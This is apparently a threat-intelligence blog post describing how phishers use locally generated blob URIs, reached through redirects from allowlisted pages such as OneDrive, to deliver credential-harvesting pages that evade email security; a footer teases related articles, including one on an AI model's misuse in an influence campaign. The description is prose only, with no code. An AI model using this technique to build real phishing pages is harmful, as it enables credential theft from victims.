Using Blob URLs to Bypass SEGs and Evade Analysis

May 14, 2025

Hackers often look for new ways to deliver their attacks, especially in the sector of phishing. Most conventional phishing pages are hosted on a server with an IP address somewhere, and once the source becomes known, security personnel can employ IP-based detection to screen those pages out, rendering the attack useless. The ideal technique for delivering a phishing page, therefore, would be one that only the desired victim could access, and would otherwise be inaccessible to investigators. One such technique has recently been studied by investigators, a technique that delivers a phishing page that cannot be traced back to a specific server because it is generated locally: the use of Blob URIs.

A binary large object, or blob, is a set of temporary data generated by a browser, often as an intermediary between the browser and server data. For example, blob URIs allow YouTube to serve videos without giving users direct access to the video file. Instead of anyone being able to access a specific video file, the video URL is obfuscated and then stored in a local blob accessible only to the user who generated it. This is referenced through a Blob Universal Resource Identifier, or Blob URI. When used legitimately, Blob URIs can provide access control and reduce network traffic by allowing browsers to temporary store data locally. However, threat actors have discovered that blobs can be used to deliver credential phishing pages in a way that is fully local, bypassing email security and signature-based detection methods.

The Blob URI credential phishing attack works like this: first, the attacker sends a bait email containing a link to an intermediary, allowlisted page, such as OneDrive. This page is then abused to redirect to an attacker-controlled HTML page. This page decodes another HTML file, containing the actual phishing webpage, into a blob format that is then stored locally. Although the blob URI is accessible only locally, it contains functionality to exfiltrate credentials over the network to another threat actor endpoint. Investigators have observed this technique being used to attack several forms of credentials, including OneDrive logins and tax accounts.

More from Blackwired

May 7, 2025

Claude AI Exploited to Operate 100+ Fake Political Personas in Global Influence Campaign

Claude AI was misused to run a propaganda network, showing new risks of AI in digital influence and fraud.

Read more
April 30, 2025

Ransomware groups test new business models to hit more victims, increase profits

Ransomware groups adapt with new models; DragonForce decentralizes tools, Anubis shifts to extortion over encryption.

Read more
April 23, 2025

Researchers claim breakthrough in fight against AI’s frustrating security hole

CaMeL secures AI by isolating untrusted input, using dual LLMs and strict code control to block prompt injections.

Read more

© 2024 Blackwired. All Rights Reserved.